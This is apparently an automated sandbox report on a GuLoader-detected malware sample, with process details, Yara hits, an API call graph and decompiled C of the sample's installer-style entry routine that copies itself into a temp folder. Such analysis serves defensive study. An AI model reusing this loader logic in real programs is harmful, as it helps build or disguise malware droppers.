                                                                          MD5 hash:7F369D460C84146944C3C12BF83901AF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low

                                                                          Target ID:4
                                                                          Start time:09:53:07
                                                                          Start date:27/05/2022
                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe"
                                                                          Imagebase:0x400000
                                                                          File size:929272 bytes
                                                                          MD5 hash:7F369D460C84146944C3C12BF83901AF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.205790119879.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low


                                                                            Execution Graph

                                                                            Execution Coverage:9.9%
                                                                            Dynamic/Decrypted Code Coverage:9.7%
                                                                            Signature Coverage:21.3%
                                                                            Total number of Nodes:1069
                                                                            Total number of Limit Nodes:46
GlobalAlloc GlobalLock 7624->7625 7627 405a24 SendMessageW 7625->7627 7627->7627 7628 405a4d GlobalUnlock SetClipboardData CloseClipboard 7627->7628 7628->7604 7629->7590 7630->7619 7631->7589 7633 4044e5 SendMessageW 7632->7633 7636 405695 7633->7636 7634 4056bc 7635 4044e5 SendMessageW 7634->7635 7637 4056ce OleUninitialize 7635->7637 7636->7634 7638 401389 2 API calls 7636->7638 7638->7636 7965 2aa9e19 7968 2aa9e25 7965->7968 7967 2aa9e73 7969 2ab906b 2 API calls 7967->7969 7970 2aa9e8f 7968->7970 7971 2abaf38 7968->7971 7969->7970 7972 2ab906b 2 API calls 7971->7972 7973 2abaf4c 7972->7973 7974 2ab906b 2 API calls 7973->7974 7975 2abafa1 7974->7975 7976 2abafac GetPEB 7975->7976 7977 2abb02f 7976->7977 8004 2abbebc 7977->8004 7979 2abb073 7980 2abb916 7979->7980 7984 2aaa114 7979->7984 7988 2abb405 7979->7988 7986 2abb9f5 7980->7986 7993 2abbc30 7980->7993 7981 2abbe74 7982 2abbebc NtProtectVirtualMemory 7981->7982 7985 2abbeb6 7982->7985 7983 2ab2f2f 7983->7967 7984->7967 7984->7983 7987 2ab9db7 3 API calls 7984->7987 7990 2ab906b 2 API calls 7984->7990 7992 2ab84bd 7984->7992 7985->7967 7989 2abbebc NtProtectVirtualMemory 7986->7989 7987->7984 7996 2abbebc NtProtectVirtualMemory 7988->7996 7991 2abbbe9 7989->7991 7990->7984 7991->7967 8001 2ab85c4 7992->8001 7993->7981 7993->7984 7995 2ab852e 7997 2ab85c0 7995->7997 8007 2abaa81 7995->8007 7996->7984 7997->7967 8002 2ab8642 CreateFileA 8001->8002 8002->7995 8005 2abbf32 NtProtectVirtualMemory 8004->8005 8005->7979 8008 2abaad4 8007->8008 8011 2abab40 8008->8011 8010 2abadce 8015 2aaa18e 8011->8015 8012 2ab9db7 3 API calls 8012->8015 8013 2ab2f2f 8013->8010 8014 2ab84bd 8016 2ab85c4 CreateFileA 8014->8016 8015->8010 8015->8012 8015->8013 8015->8014 8018 2ab906b 2 API calls 8015->8018 8017 2ab852e 8016->8017 8019 2ab85c0 8017->8019 8020 2abaa81 4 API calls 8017->8020 8018->8015 8019->8010 8021 2abaa7c 8020->8021 8022 2abaa81 4 API calls 8021->8022 8022->8021 8052 2aab01e 8053 2aab022 8052->8053 8054 2aaafb8 
8052->8054 8055 2abaa81 4 API calls 8053->8055 8058 2aab034 8053->8058 8056 2abaa7c 8055->8056 8057 2abaa81 4 API calls 8056->8057 8057->8056 8058->8058 8059 4023f4 8060 402da6 17 API calls 8059->8060 8061 402403 8060->8061 8062 402da6 17 API calls 8061->8062 8063 40240c 8062->8063 8064 402da6 17 API calls 8063->8064 8065 402416 GetPrivateProfileStringW 8064->8065 9185 401ff6 9186 402da6 17 API calls 9185->9186 9187 401ffd 9186->9187 9188 406873 2 API calls 9187->9188 9189 402003 9188->9189 9191 402014 9189->9191 9192 406484 wsprintfW 9189->9192 9192->9191 9193 2aaaf16 9194 2aaaf22 9193->9194 9196 2aaaf27 9193->9196 9195 2ab9db7 3 API calls 9194->9195 9195->9196 7201 40248a 7202 402da6 17 API calls 7201->7202 7203 40249c 7202->7203 7204 402da6 17 API calls 7203->7204 7205 4024a6 7204->7205 7218 402e36 7205->7218 7208 402c2a 7209 4024de 7211 4024ea 7209->7211 7242 402d84 7209->7242 7210 402da6 17 API calls 7212 4024d4 lstrlenW 7210->7212 7214 402509 RegSetValueExW 7211->7214 7222 4032b4 7211->7222 7212->7209 7216 40251f RegCloseKey 7214->7216 7216->7208 7219 402e51 7218->7219 7245 4063d8 7219->7245 7223 4032cd 7222->7223 7224 4032fb 7223->7224 7252 4034e5 SetFilePointer 7223->7252 7249 4034cf 7224->7249 7228 403468 7230 4034aa 7228->7230 7235 40346c 7228->7235 7229 403318 GetTickCount 7231 403452 7229->7231 7238 403367 7229->7238 7232 4034cf ReadFile 7230->7232 7231->7214 7232->7231 7233 4034cf ReadFile 7233->7238 7234 4034cf ReadFile 7234->7235 7235->7231 7235->7234 7236 4060df WriteFile 7235->7236 7236->7235 7237 4033bd GetTickCount 7237->7238 7238->7231 7238->7233 7238->7237 7239 4033e2 MulDiv wsprintfW 7238->7239 7241 4060df WriteFile 7238->7241 7240 40559f 24 API calls 7239->7240 7240->7238 7241->7238 7243 40657a 17 API calls 7242->7243 7244 402d99 7243->7244 7244->7211 7246 4063e7 7245->7246 7247 4063f2 RegCreateKeyExW 7246->7247 7248 4024b6 7246->7248 7247->7248 7248->7208 7248->7209 7248->7210 7250 4060b0 ReadFile 7249->7250 7251 403306 7250->7251 7251->7228 
7251->7229 7251->7231 7252->7224 7456 403f9a 7457 403fb2 7456->7457 7458 404113 7456->7458 7457->7458 7459 403fbe 7457->7459 7460 404164 7458->7460 7461 404124 GetDlgItem GetDlgItem 7458->7461 7463 403fc9 SetWindowPos 7459->7463 7464 403fdc 7459->7464 7462 4041be 7460->7462 7473 401389 2 API calls 7460->7473 7465 404499 18 API calls 7461->7465 7484 40410e 7462->7484 7529 4044e5 7462->7529 7463->7464 7468 403fe5 ShowWindow 7464->7468 7469 404027 7464->7469 7466 40414e SetClassLongW 7465->7466 7470 40140b 2 API calls 7466->7470 7474 404100 7468->7474 7475 404005 GetWindowLongW 7468->7475 7471 404046 7469->7471 7472 40402f DestroyWindow 7469->7472 7470->7460 7476 40404b SetWindowLongW 7471->7476 7477 40405c 7471->7477 7528 404422 7472->7528 7478 404196 7473->7478 7551 404500 7474->7551 7475->7474 7480 40401e ShowWindow 7475->7480 7476->7484 7477->7474 7482 404068 GetDlgItem 7477->7482 7478->7462 7483 40419a SendMessageW 7478->7483 7480->7469 7481 404424 DestroyWindow EndDialog 7481->7528 7487 404096 7482->7487 7488 404079 SendMessageW IsWindowEnabled 7482->7488 7483->7484 7485 40140b 2 API calls 7495 4041d0 7485->7495 7486 404453 ShowWindow 7486->7484 7490 4040a3 7487->7490 7492 4040ea SendMessageW 7487->7492 7493 4040b6 7487->7493 7501 40409b 7487->7501 7488->7484 7488->7487 7489 40657a 17 API calls 7489->7495 7490->7492 7490->7501 7492->7474 7496 4040d3 7493->7496 7497 4040be 7493->7497 7494 4040d1 7494->7474 7495->7481 7495->7484 7495->7485 7495->7489 7498 404499 18 API calls 7495->7498 7519 404364 DestroyWindow 7495->7519 7532 404499 7495->7532 7499 40140b 2 API calls 7496->7499 7545 40140b 7497->7545 7498->7495 7502 4040da 7499->7502 7548 404472 7501->7548 7502->7474 7502->7501 7504 40424b GetDlgItem 7505 404260 7504->7505 7506 404268 ShowWindow KiUserCallbackDispatcher 7504->7506 7505->7506 7535 4044bb KiUserCallbackDispatcher 7506->7535 7508 404292 EnableWindow 7513 4042a6 7508->7513 7509 4042ab GetSystemMenu EnableMenuItem SendMessageW 7510 4042db SendMessageW 
7509->7510 7509->7513 7510->7513 7513->7509 7536 4044ce SendMessageW 7513->7536 7537 403f7b 7513->7537 7540 40653d lstrcpynW 7513->7540 7515 40430a lstrlenW 7516 40657a 17 API calls 7515->7516 7517 404320 SetWindowTextW 7516->7517 7541 401389 7517->7541 7520 40437e CreateDialogParamW 7519->7520 7519->7528 7521 4043b1 7520->7521 7520->7528 7522 404499 18 API calls 7521->7522 7523 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 7522->7523 7524 401389 2 API calls 7523->7524 7525 404402 7524->7525 7525->7484 7526 40440a ShowWindow 7525->7526 7527 4044e5 SendMessageW 7526->7527 7527->7528 7528->7484 7528->7486 7530 4044fd 7529->7530 7531 4044ee SendMessageW 7529->7531 7530->7495 7531->7530 7533 40657a 17 API calls 7532->7533 7534 4044a4 SetDlgItemTextW 7533->7534 7534->7504 7535->7508 7536->7513 7538 40657a 17 API calls 7537->7538 7539 403f89 SetWindowTextW 7538->7539 7539->7513 7540->7515 7543 401390 7541->7543 7542 4013fe 7542->7495 7543->7542 7544 4013cb MulDiv SendMessageW 7543->7544 7544->7543 7546 401389 2 API calls 7545->7546 7547 401420 7546->7547 7547->7501 7549 404479 7548->7549 7550 40447f SendMessageW 7548->7550 7549->7550 7550->7494 7552 4045c3 7551->7552 7553 404518 GetWindowLongW 7551->7553 7552->7484 7553->7552 7554 40452d 7553->7554 7554->7552 7555 40455a GetSysColor 7554->7555 7556 40455d 7554->7556 7555->7556 7557 404563 SetTextColor 7556->7557 7558 40456d SetBkMode 7556->7558 7557->7558 7559 404585 GetSysColor 7558->7559 7560 40458b 7558->7560 7559->7560 7561 404592 SetBkColor 7560->7561 7562 40459c 7560->7562 7561->7562 7562->7552 7563 4045b6 CreateBrushIndirect 7562->7563 7564 4045af DeleteObject 7562->7564 7563->7552 7564->7563 7639 40259e 7650 402de6 7639->7650 7642 402d84 17 API calls 7643 4025b1 7642->7643 7644 4025d9 RegEnumValueW 7643->7644 7645 4025cd RegEnumKeyW 7643->7645 7648 40292e 7643->7648 7646 4025f5 RegCloseKey 7644->7646 7647 4025ee 7644->7647 7645->7646 7646->7648 7647->7646 7651 402da6 17 API calls 7650->7651 7652 
402dfd 7651->7652 7653 4063aa RegOpenKeyExW 7652->7653 7654 4025a8 7653->7654 7654->7642 7655 4015a3 7656 402da6 17 API calls 7655->7656 7657 4015aa SetFileAttributesW 7656->7657 7658 4015bc 7657->7658 7955 4023b2 7956 4023c0 7955->7956 7957 4023ba 7955->7957 7959 4023ce 7956->7959 7960 402da6 17 API calls 7956->7960 7958 402da6 17 API calls 7957->7958 7958->7956 7961 4023dc 7959->7961 7962 402da6 17 API calls 7959->7962 7960->7959 7963 402da6 17 API calls 7961->7963 7962->7961 7964 4023e5 WritePrivateProfileStringW 7963->7964 8692 2aab05e 8695 2aaaf3a 8692->8695 8693 2abaa81 4 API calls 8694 2abaa7c 8693->8694 8696 2abaa81 4 API calls 8694->8696 8695->8693 8697 2aab295 8695->8697 8696->8694 8697->8697

                                                                            Control-flow Graph

                                                                            C-Code - Quality: 79%
                                                                            			_entry_() {
                                                                            				WCHAR* _v8;
                                                                            				signed int _v12;
                                                                            				void* _v16;
                                                                            				signed int _v20;
                                                                            				int _v24;
                                                                            				int _v28;
                                                                            				struct _TOKEN_PRIVILEGES _v40;
                                                                            				signed char _v42;
                                                                            				int _v44;
                                                                            				signed int _v48;
                                                                            				intOrPtr _v278;
                                                                            				signed short _v310;
                                                                            				struct _OSVERSIONINFOW _v324;
                                                                            				struct _SHFILEINFOW _v1016;
                                                                            				intOrPtr* _t88;
                                                                            				WCHAR* _t92;
                                                                            				char* _t94;
                                                                            				void _t97;
                                                                            				void* _t116;
                                                                            				WCHAR* _t118;
                                                                            				signed int _t120;
                                                                            				intOrPtr* _t124;
                                                                            				void* _t138;
                                                                            				void* _t144;
                                                                            				void* _t149;
                                                                            				void* _t153;
                                                                            				void* _t158;
                                                                            				signed int _t168;
                                                                            				void* _t171;
                                                                            				void* _t176;
                                                                            				intOrPtr _t178;
                                                                            				intOrPtr _t179;
                                                                            				intOrPtr* _t180;
                                                                            				int _t189;
                                                                            				void* _t190;
                                                                            				void* _t199;
                                                                            				signed int _t205;
                                                                            				signed int _t210;
                                                                            				signed int _t215;
                                                                            				signed int _t217;
                                                                            				int* _t219;
                                                                            				signed int _t227;
                                                                            				signed int _t230;
                                                                            				CHAR* _t232;
                                                                            				char* _t233;
                                                                            				signed int _t234;
                                                                            				WCHAR* _t235;
                                                                            				void* _t251;
                                                                            
                                                                            				_t217 = 0x20;
                                                                            				_t189 = 0;
                                                                            				_v24 = 0;
                                                                            				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                            				_v20 = 0;
                                                                            				SetErrorMode(0x8001); // executed
                                                                            				_v324.szCSDVersion = 0;
                                                                            				_v48 = 0;
                                                                            				_v44 = 0;
                                                                            				_v324.dwOSVersionInfoSize = 0x11c;
                                                                            				if(GetVersionExW( &_v324) == 0) {
                                                                            					_v324.dwOSVersionInfoSize = 0x114;
                                                                            					GetVersionExW( &_v324);
                                                                            					asm("sbb eax, eax");
                                                                            					_v42 = 4;
                                                                            					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                                            				}
                                                                            				if(_v324.dwMajorVersion < 0xa) {
                                                                            					_v310 = _v310 & 0x00000000;
                                                                            				}
                                                                            				 *0x434fb8 = _v324.dwBuildNumber;
                                                                            				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                                            				if( *0x434fbe != 0x600) {
                                                                            					_t180 = E0040690A(_t189);
                                                                            					if(_t180 != _t189) {
                                                                            						 *_t180(0xc00);
                                                                            					}
                                                                            				}
                                                                            				_t232 = "UXTHEME";
                                                                            				do {
                                                                            					E0040689A(_t232); // executed
                                                                            					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                                                            				} while ( *_t232 != 0);
                                                                            				E0040690A(0xb);
                                                                            				 *0x434f04 = E0040690A(9);
                                                                            				_t88 = E0040690A(7);
                                                                            				if(_t88 != _t189) {
                                                                            					_t88 =  *_t88(0x1e);
                                                                            					if(_t88 != 0) {
                                                                            						 *0x434fbc =  *0x434fbc | 0x00000080;
                                                                            					}
                                                                            				}
                                                                            				__imp__#17();
                                                                            				__imp__OleInitialize(_t189); // executed
                                                                            				 *0x434fc0 = _t88;
                                                                            				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
                                                                            				E0040653D(0x433f00, L"NSIS Error");
                                                                            				_t92 = GetCommandLineW();
                                                                            				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe\" ";
                                                                            				E0040653D(_t233, _t92);
                                                                            				_t94 = _t233;
                                                                            				_t234 = 0x22;
                                                                            				 *0x434f00 = 0x400000;
                                                                            				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe\" " - _t234; // 0x22
                                                                            				if(_t251 == 0) {
                                                                            					_t217 = _t234;
                                                                            					_t94 =  &M00440002;
                                                                            				}
                                                                            				_t199 = CharNextW(E00405E39(_t94, _t217));
                                                                            				_v16 = _t199;
                                                                            				while(1) {
                                                                            					_t97 =  *_t199;
                                                                            					_t252 = _t97 - _t189;
                                                                            					if(_t97 == _t189) {
                                                                            						break;
                                                                            					}
                                                                            					_t210 = 0x20;
                                                                            					__eflags = _t97 - _t210;
                                                                            					if(_t97 != _t210) {
                                                                            						L17:
                                                                            						__eflags =  *_t199 - _t234;
                                                                            						_v12 = _t210;
                                                                            						if( *_t199 == _t234) {
                                                                            							_v12 = _t234;
                                                                            							_t199 = _t199 + 2;
                                                                            							__eflags = _t199;
                                                                            						}
                                                                            						__eflags =  *_t199 - 0x2f;
                                                                            						if( *_t199 != 0x2f) {
                                                                            							L32:
                                                                            							_t199 = E00405E39(_t199, _v12);
                                                                            							__eflags =  *_t199 - _t234;
                                                                            							if(__eflags == 0) {
                                                                            								_t199 = _t199 + 2;
                                                                            								__eflags = _t199;
                                                                            							}
                                                                            							continue;
                                                                            						} else {
                                                                            							_t199 = _t199 + 2;
                                                                            							__eflags =  *_t199 - 0x53;
                                                                            							if( *_t199 != 0x53) {
                                                                            								L24:
                                                                            								asm("cdq");
                                                                            								asm("cdq");
                                                                            								_t215 = L"NCRC" & 0x0000ffff;
                                                                            								asm("cdq");
                                                                            								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
                                                                            								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
                                                                            								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
                                                                            									L29:
                                                                            									asm("cdq");
                                                                            									asm("cdq");
                                                                            									_t210 = L" /D=" & 0x0000ffff;
                                                                            									asm("cdq");
                                                                            									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
                                                                            									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
                                                                            									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
                                                                            										L31:
                                                                            										_t234 = 0x22;
                                                                            										goto L32;
                                                                            									}
                                                                            									__eflags =  *_t199 - _t230;
                                                                            									if( *_t199 == _t230) {
                                                                            										 *(_t199 - 4) = _t189;
                                                                            										__eflags = _t199;
                                                                            										E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t199);
                                                                            										L37:
                                                                            										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                                            										GetTempPathW(0x400, _t235);
                                                                            										_t116 = E004034FC(_t199, _t252);
                                                                            										_t253 = _t116;
                                                                            										if(_t116 != 0) {
                                                                            											L40:
                                                                            											DeleteFileW(L"1033"); // executed
                                                                            											_t118 = E0040307D(_t255, _v20); // executed
                                                                            											_v8 = _t118;
                                                                            											if(_t118 != _t189) {
                                                                            												L68:
                                                                            												E00403B12();
                                                                            												__imp__OleUninitialize();
                                                                            												if(_v8 == _t189) {
                                                                            													if( *0x434f94 == _t189) {
                                                                            														L77:
                                                                            														_t120 =  *0x434fac;
                                                                            														if(_t120 != 0xffffffff) {
                                                                            															_v24 = _t120;
                                                                            														}
                                                                            														ExitProcess(_v24);
                                                                            													}
                                                                            													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                                            														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                                            														_v40.PrivilegeCount = 1;
                                                                            														_v28 = 2;
                                                                            														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                                            													}
                                                                            													_t124 = E0040690A(4);
                                                                            													if(_t124 == _t189) {
                                                                            														L75:
                                                                            														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                                            															goto L77;
                                                                            														}
                                                                            														goto L76;
                                                                            													} else {
                                                                            														_push(0x80040002);
                                                                            														_push(0x25);
                                                                            														_push(_t189);
                                                                            														_push(_t189);
                                                                            														_push(_t189);
                                                                            														if( *_t124() == 0) {
                                                                            															L76:
                                                                            															E0040140B(9);
                                                                            															goto L77;
                                                                            														}
                                                                            														goto L75;
                                                                            													}
                                                                            												}
                                                                            												E00405B9D(_v8, 0x200010);
                                                                            												ExitProcess(2);
                                                                            											}
                                                                            											if( *0x434f1c == _t189) {
                                                                            												L51:
                                                                            												 *0x434fac =  *0x434fac | 0xffffffff;
                                                                            												_v24 = E00403BEC(_t265);
                                                                            												goto L68;
                                                                            											}
                                                                            											_t219 = E00405E39(L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe\" ", _t189);
                                                                            											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe\" ") {
                                                                            												L48:
                                                                            												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe\" ";
                                                                            												_v8 = L"Error launching installer";
                                                                            												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe\" ") {
                                                                            													_t190 = E00405B08(__eflags);
                                                                            													lstrcatW(_t235, L"~nsu");
                                                                            													__eflags = _t190;
                                                                            													if(_t190 != 0) {
                                                                            														lstrcatW(_t235, "A");
                                                                            													}
                                                                            													lstrcatW(_t235, L".tmp");
                                                                            													_t220 = L"C:\\Users\\Arthur\\Desktop";
                                                                            													_t138 = lstrcmpiW(_t235, L"C:\\Users\\Arthur\\Desktop");
                                                                            													__eflags = _t138;
                                                                            													if(_t138 == 0) {
                                                                            														L67:
                                                                            														_t189 = 0;
                                                                            														__eflags = 0;
                                                                            														goto L68;
                                                                            													} else {
                                                                            														__eflags = _t190;
                                                                            														_push(_t235);
                                                                            														if(_t190 == 0) {
                                                                            															E00405AEB();
                                                                            														} else {
                                                                            															E00405A6E();
                                                                            														}
                                                                            														SetCurrentDirectoryW(_t235);
                                                                            														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp"; // 0x43
                                                                            														if(__eflags == 0) {
                                                                            															E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t220);
                                                                            														}
                                                                            														E0040653D(0x436000, _v16);
                                                                            														_t202 = "A" & 0x0000ffff;
                                                                            														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                            														__eflags = _t144;
                                                                            														_v12 = 0x1a;
                                                                            														 *0x436800 = _t144;
                                                                            														do {
                                                                            															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
                                                                            															DeleteFileW(0x42aa28);
                                                                            															__eflags = _v8;
                                                                            															if(_v8 != 0) {
                                                                            																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe", 0x42aa28, 1);
                                                                            																__eflags = _t149;
                                                                            																if(_t149 != 0) {
                                                                            																	E004062FD(_t202, 0x42aa28, 0);
                                                                            																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
                                                                            																	_t153 = E00405B20(0x42aa28);
                                                                            																	__eflags = _t153;
                                                                            																	if(_t153 != 0) {
                                                                            																		CloseHandle(_t153);
                                                                            																		_v8 = 0;
                                                                            																	}
                                                                            																}
                                                                            															}
                                                                            															 *0x436800 =  *0x436800 + 1;
                                                                            															_t61 =  &_v12;
                                                                            															 *_t61 = _v12 - 1;
                                                                            															__eflags =  *_t61;
                                                                            														} while ( *_t61 != 0);
                                                                            														E004062FD(_t202, _t235, 0);
                                                                            														goto L67;
                                                                            													}
                                                                            												}
                                                                            												 *_t219 = _t189;
                                                                            												_t222 =  &(_t219[2]);
                                                                            												_t158 = E00405F14(_t264,  &(_t219[2]));
                                                                            												_t265 = _t158;
                                                                            												if(_t158 == 0) {
                                                                            													goto L68;
                                                                            												}
                                                                            												E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
                                                                            												E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
                                                                            												_v8 = _t189;
                                                                            												goto L51;
                                                                            											}
                                                                            											asm("cdq");
                                                                            											asm("cdq");
                                                                            											asm("cdq");
                                                                            											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                            											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                                            											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                                            												_t219 = _t219;
                                                                            												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe\" ") {
                                                                            													continue;
                                                                            												}
                                                                            												break;
                                                                            											}
                                                                            											_t189 = 0;
                                                                            											goto L48;
                                                                            										}
                                                                            										GetWindowsDirectoryW(_t235, 0x3fb);
                                                                            										lstrcatW(_t235, L"\\Temp");
                                                                            										_t171 = E004034FC(_t199, _t253);
                                                                            										_t254 = _t171;
                                                                            										if(_t171 != 0) {
                                                                            											goto L40;
                                                                            										}
                                                                            										GetTempPathW(0x3fc, _t235);
                                                                            										lstrcatW(_t235, L"Low");
                                                                            										SetEnvironmentVariableW(L"TEMP", _t235);
                                                                            										SetEnvironmentVariableW(L"TMP", _t235);
                                                                            										_t176 = E004034FC(_t199, _t254);
                                                                            										_t255 = _t176;
                                                                            										if(_t176 == 0) {
                                                                            											goto L68;
                                                                            										}
                                                                            										goto L40;
                                                                            									}
                                                                            									goto L31;
                                                                            								}
                                                                            								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                                            								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                                            									goto L29;
                                                                            								}
                                                                            								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                                            								__eflags = _t178 - 0x20;
                                                                            								if(_t178 == 0x20) {
                                                                            									L28:
                                                                            									_t36 =  &_v20;
                                                                            									 *_t36 = _v20 | 0x00000004;
                                                                            									__eflags =  *_t36;
                                                                            									goto L29;
                                                                            								}
                                                                            								__eflags = _t178 - _t189;
                                                                            								if(_t178 != _t189) {
                                                                            									goto L29;
                                                                            								}
                                                                            								goto L28;
                                                                            							}
                                                                            							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                                            							__eflags = _t179 - _t210;
                                                                            							if(_t179 == _t210) {
                                                                            								L23:
                                                                            								 *0x434fa0 = 1;
                                                                            								goto L24;
                                                                            							}
                                                                            							__eflags = _t179 - _t189;
                                                                            							if(_t179 != _t189) {
                                                                            								goto L24;
                                                                            							}
                                                                            							goto L23;
                                                                            						}
                                                                            					} else {
                                                                            						goto L16;
                                                                            					}
                                                                            					do {
                                                                            						L16:
                                                                            						_t199 = _t199 + 2;
                                                                            						__eflags =  *_t199 - _t210;
                                                                            					} while ( *_t199 == _t210);
                                                                            					goto L17;
                                                                            				}
                                                                            				goto L37;
                                                                            			}



















































                                                                            0x00403882
                                                                            0x00403a59
                                                                            0x00403a59
                                                                            0x00403a5e
                                                                            0x00403a67
                                                                            0x00403a84
                                                                            0x00403afc
                                                                            0x00403afc
                                                                            0x00403b04
                                                                            0x00403b06
                                                                            0x00403b06
                                                                            0x00403b0c
                                                                            0x00403b0c
                                                                            0x00403a9b
                                                                            0x00403aa7
                                                                            0x00403ab8
                                                                            0x00403abf
                                                                            0x00403ac6
                                                                            0x00403ac6
                                                                            0x00403ace
                                                                            0x00403ada
                                                                            0x00403ae8
                                                                            0x00403af3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403adc
                                                                            0x00403adc
                                                                            0x00403add
                                                                            0x00403adf
                                                                            0x00403ae0
                                                                            0x00403ae1
                                                                            0x00403ae6
                                                                            0x00403af5
                                                                            0x00403af7
                                                                            0x00000000
                                                                            0x00403af7
                                                                            0x00000000
                                                                            0x00403ae6
                                                                            0x00403ada
                                                                            0x00403a71
                                                                            0x00403a78
                                                                            0x00403a78
                                                                            0x0040388e
                                                                            0x00403935
                                                                            0x00403935
                                                                            0x00403941
                                                                            0x00000000
                                                                            0x00403941
                                                                            0x0040389f
                                                                            0x004038a7
                                                                            0x004038f9
                                                                            0x004038f9
                                                                            0x004038ff
                                                                            0x00403906
                                                                            0x00403954
                                                                            0x00403956
                                                                            0x0040395b
                                                                            0x0040395d
                                                                            0x00403965
                                                                            0x00403965
                                                                            0x00403970
                                                                            0x00403975
                                                                            0x0040397c
                                                                            0x00403982
                                                                            0x00403984
                                                                            0x00403a57
                                                                            0x00403a57
                                                                            0x00403a57
                                                                            0x00000000
                                                                            0x0040398a
                                                                            0x0040398a
                                                                            0x0040398c
                                                                            0x0040398d
                                                                            0x00403996
                                                                            0x0040398f
                                                                            0x0040398f
                                                                            0x0040398f
                                                                            0x0040399c
                                                                            0x004039a4
                                                                            0x004039ab
                                                                            0x004039b3
                                                                            0x004039b3
                                                                            0x004039c0
                                                                            0x004039cc
                                                                            0x004039d6
                                                                            0x004039d6
                                                                            0x004039d8
                                                                            0x004039df
                                                                            0x004039e9
                                                                            0x004039f5
                                                                            0x004039fb
                                                                            0x00403a01
                                                                            0x00403a04
                                                                            0x00403a0e
                                                                            0x00403a14
                                                                            0x00403a16
                                                                            0x00403a1a
                                                                            0x00403a2b
                                                                            0x00403a31
                                                                            0x00403a36
                                                                            0x00403a38
                                                                            0x00403a3b
                                                                            0x00403a41
                                                                            0x00403a41
                                                                            0x00403a38
                                                                            0x00403a16
                                                                            0x00403a44
                                                                            0x00403a4b
                                                                            0x00403a4b
                                                                            0x00403a4b
                                                                            0x00403a4b
                                                                            0x00403a52
                                                                            0x00000000
                                                                            0x00403a52
                                                                            0x00403984
                                                                            0x00403908
                                                                            0x0040390b
                                                                            0x0040390f
                                                                            0x00403914
                                                                            0x00403916
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403922
                                                                            0x0040392d
                                                                            0x00403932
